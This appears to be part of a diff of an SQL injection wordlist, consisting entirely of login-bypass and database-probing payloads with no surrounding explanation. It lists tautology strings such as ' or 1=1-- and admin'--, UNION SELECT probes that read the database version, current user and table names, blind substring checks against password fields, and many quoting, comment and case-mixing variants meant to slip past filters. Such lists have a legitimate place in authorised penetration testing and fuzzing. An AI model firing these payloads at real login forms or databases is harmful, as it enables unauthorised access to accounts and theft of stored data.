' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
